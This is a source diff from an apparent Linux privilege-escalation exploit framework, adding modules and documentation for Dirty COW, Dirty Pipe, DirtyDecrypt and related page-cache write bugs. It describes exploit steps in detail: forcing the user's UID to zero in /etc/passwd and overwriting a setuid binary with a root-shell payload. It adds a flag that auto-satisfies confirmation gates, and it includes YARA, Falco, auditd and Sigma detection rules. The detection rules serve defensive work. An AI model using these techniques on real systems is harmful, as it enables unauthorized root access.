+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 /* ----- dirty_frag_esp6 (CVE-2026-43284 v6) ----- */
@@ -208,6 +324,8 @@ const struct skeletonkey_module dirty_frag_esp_module = {
 static skeletonkey_result_t dirty_frag_esp6_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_esp6", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_esp6_detect();
 }

@@ -229,8 +347,10 @@ const struct skeletonkey_module dirty_frag_esp6_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 /* ----- dirty_frag_rxrpc (CVE-2026-43500) ----- */
@@ -238,6 +358,8 @@ const struct skeletonkey_module dirty_frag_esp6_module = {
 static skeletonkey_result_t dirty_frag_rxrpc_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_rxrpc", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_rxrpc_detect();
 }

@@ -259,8 +381,10 @@ const struct skeletonkey_module dirty_frag_rxrpc_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 /* ----- Family registration ----- */
@@ -31,6 +31,7 @@ bool dirtyfail_use_color    = true;
 bool dirtyfail_active_probes = false;
 bool dirtyfail_no_revert    = false;
 bool dirtyfail_json         = false;
+bool dirtyfail_assume_yes   = false;

 static void vlog(FILE *out, const char *prefix, const char *color,
                 const char *fmt, va_list ap)
@@ -226,6 +227,19 @@ size_t build_authenc_keyblob(unsigned char *out,

 bool typed_confirm(const char *expected)
 {
+    /* When the caller has already cleared an explicit authorization gate
+     * (SKELETONKEY's --i-know, forwarded via dirtyfail_assume_yes), the
+     * DIRTYFAIL typed prompt is redundant and would deadlock non-interactive
+     * runs like `skeletonkey --auto --i-know`. Auto-satisfy it.
+     *
+     * The SSH self-lockout guard (YES_BREAK_SSH) is deliberately exempt:
+     * it protects the operator's own access rather than gating
+     * authorization, so it always requires an interactive answer. */
+    if (dirtyfail_assume_yes && strcmp(expected, "YES_BREAK_SSH") != 0) {
+        log_step("confirmation gate '%s' auto-satisfied (--i-know)", expected);
+        return true;
+    }
+
    char buf[128];
    printf("    Type \033[1;33m%s\033[0m and press enter to proceed: ", expected);
    fflush(stdout);
@@ -86,6 +86,14 @@ extern bool dirtyfail_no_revert;
 * is redirected to stderr. Set by --json. */
 extern bool dirtyfail_json;

+/* When true, typed_confirm() auto-satisfies its gate instead of reading
+ * stdin — the caller has already cleared an explicit authorization gate.
+ * SKELETONKEY's bridge layer sets this from skeletonkey_ctx.authorized
+ * (i.e. the --i-know flag) so non-interactive runs like
+ * `skeletonkey --auto --i-know` don't deadlock on the DIRTYFAIL prompt.
+ * The YES_BREAK_SSH self-lockout guard is exempt — see typed_confirm(). */
+extern bool dirtyfail_assume_yes;
+
 void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
 void log_ok   (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
 void log_bad  (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
@@ -43,15 +43,19 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
-#include <stdatomic.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include <stdint.h>
+#include <stdatomic.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <pwd.h>
@@ -228,22 +232,27 @@ static void revert_passwd_page_cache(void)

 static skeletonkey_result_t dirty_cow_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] dirty_cow: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] dirty_cow: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&dirty_cow_range, &v);
+    bool patched = kernel_range_is_patched(&dirty_cow_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] dirty_cow: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] dirty_cow: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
        fprintf(stderr, "[!] dirty_cow: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] dirty_cow: --exploit will race a write to "
                        "/etc/passwd via /proc/self/mem\n");
    }
@@ -258,7 +267,10 @@ static skeletonkey_result_t dirty_cow_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] dirty_cow: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -318,6 +330,34 @@ static skeletonkey_result_t dirty_cow_cleanup(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: the Dirty COW primitive (writer thread via
+ * /proc/self/mem + madvise(MADV_DONTNEED)) is Linux-only kernel
+ * surface. Stub out cleanly so the module still registers and
+ * `--list` / `--detect-rules` work on macOS/BSD dev boxes — and so
+ * the top-level `make` actually completes there. */
+static skeletonkey_result_t dirty_cow_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] dirty_cow: Linux-only module "
+                "(/proc/self/mem + madvise race) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_cow_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] dirty_cow: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_cow_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ---- Embedded detection rules ---- */

 static const char dirty_cow_auditd[] =
@@ -350,6 +390,35 @@ static const char dirty_cow_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2016.5195]\n";

+static const char dirty_cow_yara[] =
+    "rule dirty_cow_cve_2016_5195 : cve_2016_5195 page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2016-5195\"\n"
+    "        description = \"Dirty COW /etc/passwd UID-flip pattern (non-root user remapped to 0000+)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n";
+
+static const char dirty_cow_falco[] =
+    "- rule: Dirty COW pwrite on /proc/self/mem by non-root\n"
+    "  desc: |\n"
+    "    Non-root pwrite() targeting /proc/self/mem at an offset that\n"
+    "    overlaps a private mmap of /etc/passwd. Combined with a\n"
+    "    racing madvise(MADV_DONTNEED) loop this is the Dirty COW\n"
+    "    primitive (CVE-2016-5195).\n"
+    "  condition: >\n"
+    "    evt.type = pwrite and fd.name = /proc/self/mem and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    pwrite to /proc/self/mem by non-root\n"
+    "    (user=%user.name proc=%proc.name pid=%proc.pid)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2016.5195]\n";
+
 const struct skeletonkey_module dirty_cow_module = {
    .name           = "dirty_cow",
    .cve            = "CVE-2016-5195",
@@ -362,8 +431,10 @@ const struct skeletonkey_module dirty_cow_module = {
    .cleanup        = dirty_cow_cleanup,
    .detect_auditd  = dirty_cow_auditd,
    .detect_sigma   = dirty_cow_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = dirty_cow_yara,
+    .detect_falco   = dirty_cow_falco,
+    .opsec_notes    = "Two-thread race: Thread A loops pwrite(/proc/self/mem) at the user's UID offset in /etc/passwd; Thread B loops madvise(MADV_DONTNEED) on a PRIVATE mmap of /etc/passwd. Overwrites the UID field with all-zeros, then execlp('su') to claim root. UID offset is parsed from the file, not hardcoded. Audit-visible via open(/proc/self/mem) + write + madvise(MADV_DONTNEED) bursts + /etc/passwd page-cache poisoning. Cleanup callback calls posix_fadvise(POSIX_FADV_DONTNEED) on /etc/passwd and writes 3 to /proc/sys/vm/drop_caches to evict.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_dirty_cow(void)
@@ -32,7 +32,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 /* _GNU_SOURCE is passed via -D in the top-level Makefile; do not
 * redefine here (warning: redefined). */
@@ -42,6 +41,11 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"   /* used inside this block only */
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <errno.h>
 #include <sys/stat.h>
@@ -254,22 +258,27 @@ static int dirty_pipe_active_probe(void)

 static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] dirty_pipe: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] dirty_pipe: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.8. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 8)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 8, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] dirty_pipe: kernel %s predates the bug (introduced in 5.8)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched_by_version = kernel_range_is_patched(&dirty_pipe_range, &v);
+    bool patched_by_version = kernel_range_is_patched(&dirty_pipe_range, v);

    /* Active probe overrides version-only verdict when requested.
     * The version check is necessary-but-not-sufficient: distros
@@ -284,7 +293,7 @@ static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
        if (probe == 1) {
            if (!ctx->json) {
                fprintf(stderr, "[!] dirty_pipe: ACTIVE PROBE CONFIRMED — primitive lands "
-                                "(version %s)\n", v.release);
+                                "(version %s)\n", v->release);
            }
            return SKELETONKEY_VULNERABLE;
        }
@@ -307,14 +316,14 @@ static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
    if (patched_by_version) {
        if (!ctx->json) {
            fprintf(stderr, "[+] dirty_pipe: kernel %s is patched (version-only check; "
-                            "use --active to confirm empirically)\n", v.release);
+                            "use --active to confirm empirically)\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
        fprintf(stderr, "[!] dirty_pipe: kernel %s appears VULNERABLE (version-only check)\n"
                        "    Confirm empirically: re-run with --scan --active\n",
-                v.release);
+                v->release);
    }
    return SKELETONKEY_VULNERABLE;
 }
@@ -328,17 +337,20 @@ static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx
        return pre;
    }

-    /* Resolve current user. */
+    /* Resolve current user. Consult ctx->host->is_root for the
+     * already-root short-circuit so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
    uid_t euid = geteuid();
    struct passwd *pw = getpwuid(euid);
    if (!pw) {
        fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno));
        return SKELETONKEY_TEST_ERROR;
    }
-    if (euid == 0) {
-        fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
-        return SKELETONKEY_OK;
-    }

    /* Find the UID field. Need a 4-digit-or-similar UID we can replace
     * with "0000" of identical width. Refuse if the user's UID width
@@ -407,6 +419,34 @@ static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: splice() / F_GETPIPE_SZ / posix_fadvise() are
+ * Linux-only kernel surface; the Dirty Pipe primitive is structurally
+ * unreachable elsewhere. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] dirty_pipe: Linux-only module "
+                "(splice + PIPE_BUF_FLAG_CAN_MERGE) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] dirty_pipe: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* Embedded detection rules — keep the binary self-contained so
 * `skeletonkey --detect-rules --format=auditd` works without a separate
 * data-dir install. */
@@ -420,6 +460,39 @@ static const char dirty_pipe_auditd[] =
    "-a always,exit -F arch=b64 -S splice -k skeletonkey-dirty-pipe-splice\n"
    "-a always,exit -F arch=b32 -S splice -k skeletonkey-dirty-pipe-splice\n";

+static const char dirty_pipe_yara[] =
+    "rule dirty_pipe_passwd_uid_flip : cve_2022_0847 page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0847\"\n"
+    "        description = \"Dirty Pipe (CVE-2022-0847): /etc/passwd page-cache UID flip — non-root username remapped to UID 0000+. Scan /etc/passwd directly; legitimate root entries use '0:', never '0000:'.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n";
+
+static const char dirty_pipe_falco[] =
+    "- rule: Dirty Pipe splice from setuid/sensitive file by non-root\n"
+    "  desc: |\n"
+    "    A non-root process calls splice() with a fd pointing at a\n"
+    "    setuid-root binary or a credential file. The Dirty Pipe\n"
+    "    primitive (CVE-2022-0847) splices 1 byte from the target to\n"
+    "    a prepared pipe to inherit the stale PIPE_BUF_FLAG_CAN_MERGE,\n"
+    "    then writes attacker bytes that land in the file's page cache.\n"
+    "  condition: >\n"
+    "    evt.type = splice and not user.uid = 0 and\n"
+    "    (fd.name in (/etc/passwd, /etc/shadow, /etc/sudoers)\n"
+    "     or fd.name startswith /usr/bin/su\n"
+    "     or fd.name startswith /usr/bin/passwd\n"
+    "     or fd.name startswith /bin/su)\n"
+    "  output: >\n"
+    "    Dirty Pipe-style splice from sensitive file by non-root\n"
+    "    (user=%user.name proc=%proc.name fd=%fd.name pid=%proc.pid)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2022.0847]\n";
+
 static const char dirty_pipe_sigma[] =
    "title: Possible Dirty Pipe exploitation (CVE-2022-0847)\n"
    "id: f6b13c08-skeletonkey-dirty-pipe\n"
@@ -447,8 +520,10 @@ const struct skeletonkey_module dirty_pipe_module = {
    .cleanup        = dirty_pipe_cleanup,
    .detect_auditd  = dirty_pipe_auditd,
    .detect_sigma   = dirty_pipe_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = dirty_pipe_yara,
+    .detect_falco   = dirty_pipe_falco,
+    .opsec_notes    = "Creates a pipe, fills+drains to leave PIPE_BUF_FLAG_CAN_MERGE on every slot; finds the UID offset in /etc/passwd by parsing the file; splice(1 byte) from (target_offset-1) to inherit the stale flag, then write(pipe) with the all-zero payload - kernel merges into the file's page cache. Offset must be non-page-aligned and the write must fit in a single page. Audit-visible via splice(fd=/etc/passwd) + write from a non-root process. --active mode writes/reads /tmp/skeletonkey-dirty-pipe-probe-XXXXXX to verify. Cleanup callback evicts /etc/passwd via posix_fadvise + drop_caches.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_dirty_pipe(void)
@@ -0,0 +1,81 @@
+# dirtydecrypt — CVE-2026-31635
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public V12 PoC into
+> the `skeletonkey_module` interface. **Not yet validated end-to-end on
+> a vulnerable-kernel VM** — see _Verification status_ below.
+
+## Summary
+
+DirtyDecrypt (a.k.a. DirtyCBC) is a missing copy-on-write guard in
+`rxgk_decrypt_skb()` (`net/rxrpc/rxgk_common.h`). The function decrypts
+incoming rxgk socket buffers **in place** before the HMAC is verified.
+When the skb fragment pages are page-cache pages — spliced in via
+`MSG_SPLICE_PAGES` over loopback — the in-place AES decrypt corrupts the
+page cache of a read-only file.
+
+It is a sibling of Copy Fail (CVE-2026-31431) and Dirty Frag
+(CVE-2026-43284 / 43500): same bug class, different kernel subsystem
+(rxgk / AFS-style rxrpc encryption rather than algif_aead or xfrm-ESP).
+
+## Primitive
+
+Each `fire()`:
+
+1. Adds an `rxrpc` security key holding a crafted rxgk XDR token.
+2. Opens an `AF_RXRPC` client + a fake UDP server on loopback and
+   completes the rxgk handshake.
+3. Forges a DATA packet whose **wire header comes from userspace** and
+   whose **payload pages come from the target file's page cache**
+   (`splice` + `vmsplice`).
+4. The kernel decrypts the spliced page-cache pages in place — the HMAC
+   check then fails (expected), but the page cache is already mutated.
+
+`pagecache_write()` drives a **sliding-window** technique: byte[0] of
+each corrupted 16-byte AES block is uniformly random (≈1/256 chance of
+the wanted value), and round _i+1_ at offset _S+i+1_ overwrites the
+15-byte collateral of round _i_ without disturbing the byte round _i_
+fixed. Net cost ≈ 256 fires per byte.
+
+The exploit rewrites the first 120 bytes of a setuid-root binary
+(`/usr/bin/su` and friends) with a tiny ET_DYN ELF that calls
+`setuid(0)` + `execve("/bin/sh")`.
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks AF_RXRPC reachability + a readable setuid carrier. With `--active`, fires the primitive against a disposable `/tmp` file and reports VULNERABLE/OK empirically. |
+| `--exploit … --i-know` | Forks a child that corrupts the carrier's page cache and execs it for a root shell. `--no-shell` stops after the page-cache write. |
+| `--cleanup` | Evicts the carrier from the page cache (`POSIX_FADV_DONTNEED` + `drop_caches`). The on-disk binary is never written. |
+| `--detect-rules` | Emits embedded auditd + sigma rules. |
+
+## Preconditions
+
+- `AF_RXRPC` reachable (the `rxrpc` module loadable / built in).
+- A readable setuid-root binary to use as the payload carrier.
+- x86_64 (the embedded ELF payload is x86_64 shellcode).
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/v12-security/pocs/tree/main/dirtydecrypt>, compiled
+into the SKELETONKEY module interface. The **exploit body** has not
+been validated end-to-end against a known-vulnerable kernel inside the
+SKELETONKEY CI matrix.
+
+**`detect()` is now version-pinned** against the mainline fix commit
+[`a2567217ade970ecc458144b6be469bc015b23e5`][fix] (Linux 7.0): kernels
+< 7.0 predate the vulnerable rxgk RESPONSE-handling code (Debian
+tracker confirms older stable branches as <not-affected, vulnerable
+code not present>), kernels ≥ 7.0 have the fix. With `--active`, the
+detector runs the rxgk primitive against a `/tmp` sentinel and reports
+empirically — catches pre-fix 7.0-rc kernels and any distro rebuilds
+the version check misses.
+
+[fix]: https://git.kernel.org/linus/a2567217ade970ecc458144b6be469bc015b23e5
+
+**Before promoting to 🟢:** validate the exploit end-to-end on a 7.0-rc
+kernel that pre-dates commit `a2567217ade…`. The Debian tracker entry
+for CVE-2026-31635 is the source of truth for branch-backport
+thresholds; extend the `kernel_range` table when distros publish
+stable backports.
@@ -0,0 +1,47 @@
+# NOTICE — dirtydecrypt
+
+## Vulnerability
+
+**CVE-2026-31635** — "DirtyDecrypt" / "DirtyCBC". Missing copy-on-write
+guard in `rxgk_decrypt_skb()` (`net/rxrpc/rxgk_common.h`). The function
+calls `skb_to_sgvec()` then `crypto_krb5_decrypt()` with no
+`skb_cow_data()`; the `krb5enc` AEAD template (`crypto/krb5enc.c`)
+decrypts **in place** before verifying the HMAC. When the skb fragment
+pages are page-cache pages (spliced in via `MSG_SPLICE_PAGES` over
+loopback), the in-place decrypt corrupts the page cache of a read-only
+file. The same pattern exists in rxkad (`rxkad_verify_packet_2`).
+
+Sibling of Copy Fail (CVE-2026-31431) and Dirty Frag
+(CVE-2026-43284 / CVE-2026-43500) — all are page-cache write
+primitives that abuse a missing COW boundary.
+
+## Research credit
+
+Discovered and reported by **Zellic** and the **V12 security** team.
+Public proof-of-concept by **Luna Tong** ("cts" / "gf_256") of the
+V12 security team.
+
+> Reference PoC: <https://github.com/v12-security/pocs/tree/main/dirtydecrypt>
+
+The upstream PoC file (`poc.c`) carries no author, project, or
+`LICENSE` header of its own — its header is a purely technical
+description of the bug. The credit above is from the public
+disclosure, not from the file. CVE-2026-31635 was assigned for the
+flaw; its fix commit is not pinned in this module (see below).
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` is a port of the V12 PoC into the
+`skeletonkey_module` interface. The exploit primitive — the
+`fire()` / `pagecache_write()` sliding-window machinery, the rxgk XDR
+token builder, the 120-byte ET_DYN ELF payload — is reproduced from
+that PoC. SKELETONKEY adds the detect/cleanup lifecycle, an `--active`
+sentinel probe, `--no-shell` support, and the embedded detection
+rules. Research credit belongs to the people above.
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable-kernel VM.**
+The CVE-2026-31635 fix commit is not yet pinned in this module, so
+`detect()` does not perform a kernel-version patched/vulnerable
+verdict — see `MODULE.md`.
@@ -0,0 +1,28 @@
+# DirtyDecrypt (CVE-2026-31635) — auditd detection rules
+#
+# The rxgk in-place decrypt corrupts the page cache of a read-only
+# file. These rules flag the syscall surface the exploit drives and
+# writes to the setuid binaries it targets.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# Modification of common payload carriers / credential files
+-w /usr/bin/su     -p wa -k skeletonkey-dirtydecrypt
+-w /bin/su         -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/mount  -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/passwd -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/chsh   -p wa -k skeletonkey-dirtydecrypt
+-w /etc/passwd     -p wa -k skeletonkey-dirtydecrypt
+-w /etc/shadow     -p wa -k skeletonkey-dirtydecrypt
+
+# AF_RXRPC socket creation (family 33) — core of the rxgk trigger
+-a always,exit -F arch=b64 -S socket -F a0=33 -k skeletonkey-dirtydecrypt-rxrpc
+
+# rxrpc security keys added to the process keyring
+-a always,exit -F arch=b64 -S add_key -k skeletonkey-dirtydecrypt-key
+
+# splice() drives page-cache pages into the forged DATA packet
+-a always,exit -F arch=b64 -S splice -k skeletonkey-dirtydecrypt-splice
+-a always,exit -F arch=b32 -S splice -k skeletonkey-dirtydecrypt-splice
@@ -0,0 +1,32 @@
+title: Possible DirtyDecrypt exploitation (CVE-2026-31635)
+id: 7c1e9a40-skeletonkey-dirtydecrypt
+status: experimental
+description: |
+  Detects the file-modification footprint of the rxgk page-cache write
+  (DirtyDecrypt / DirtyCBC, CVE-2026-31635): non-root creation of
+  AF_RXRPC sockets followed by modification of a setuid-root binary or
+  a credential file.
+references:
+  - https://github.com/v12-security/pocs/tree/main/dirtydecrypt
+logsource:
+  product: linux
+  service: auditd
+detection:
+  modification:
+    type: 'PATH'
+    name|startswith:
+      - '/usr/bin/su'
+      - '/bin/su'
+      - '/usr/bin/mount'
+      - '/usr/bin/passwd'
+      - '/usr/bin/chsh'
+      - '/etc/passwd'
+      - '/etc/shadow'
+  not_root:
+    auid|expression: '!= 0'
+  condition: modification and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.31635
@@ -0,0 +1,12 @@
+/*
+ * dirtydecrypt_cve_2026_31635 — SKELETONKEY module registry hook
+ */
+
+#ifndef DIRTYDECRYPT_SKELETONKEY_MODULES_H
+#define DIRTYDECRYPT_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module dirtydecrypt_module;
+
+#endif
@@ -32,6 +32,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdint.h>
@@ -108,40 +109,33 @@ unsigned long entrybleed_leak_kbase_lib(unsigned long entry_syscall_slot_offset)
    return (unsigned long)best_base;
 }

-static int read_first_line(const char *path, char *out, size_t n)
-{
-    FILE *f = fopen(path, "r");
-    if (!f) return -1;
-    if (!fgets(out, n, f)) { fclose(f); return -1; }
-    fclose(f);
-    /* trim trailing newline */
-    size_t L = strlen(out);
-    while (L && (out[L-1] == '\n' || out[L-1] == '\r')) out[--L] = 0;
-    return 0;
-}
+/* (read_first_line() removed — meltdown status now comes from
+ * ctx->host->meltdown_mitigation, populated once at startup in
+ * core/host.c. One file open across the corpus instead of per-detect.) */

 static skeletonkey_result_t entrybleed_detect(const struct skeletonkey_ctx *ctx)
 {
-    /* Probe KPTI status. /sys/devices/system/cpu/vulnerabilities/meltdown
-     * is the most direct signal: "Mitigation: PTI" means KPTI is on
-     * (= EntryBleed-applicable). "Not affected" means a hardened CPU
-     * (very recent Intel + most AMD = no KPTI = no EntryBleed). */
-    char buf[256];
-    int rc = read_first_line(
-        "/sys/devices/system/cpu/vulnerabilities/meltdown", buf, sizeof buf);
-    if (rc < 0) {
+    /* KPTI status comes from the shared host fingerprint
+     * (ctx->host->meltdown_mitigation) — populated once at startup by
+     * reading /sys/devices/system/cpu/vulnerabilities/meltdown. The
+     * raw string is preserved (not just the kpti_enabled bool) so we
+     * can distinguish "Not affected" (CPU immune; OK) from
+     * "Mitigation: PTI" / "Vulnerable" (KPTI on; vulnerable to
+     * EntryBleed) without re-reading sysfs. */
+    const char *meltdown = ctx->host ? ctx->host->meltdown_mitigation : "";
+    if (meltdown[0] == '\0') {
        if (!ctx->json) {
-            fprintf(stderr, "[?] entrybleed: cannot read meltdown vuln status — "
+            fprintf(stderr, "[?] entrybleed: meltdown vuln status unknown — "
                            "assuming KPTI on (conservative)\n");
        }
        return SKELETONKEY_VULNERABLE;
    }
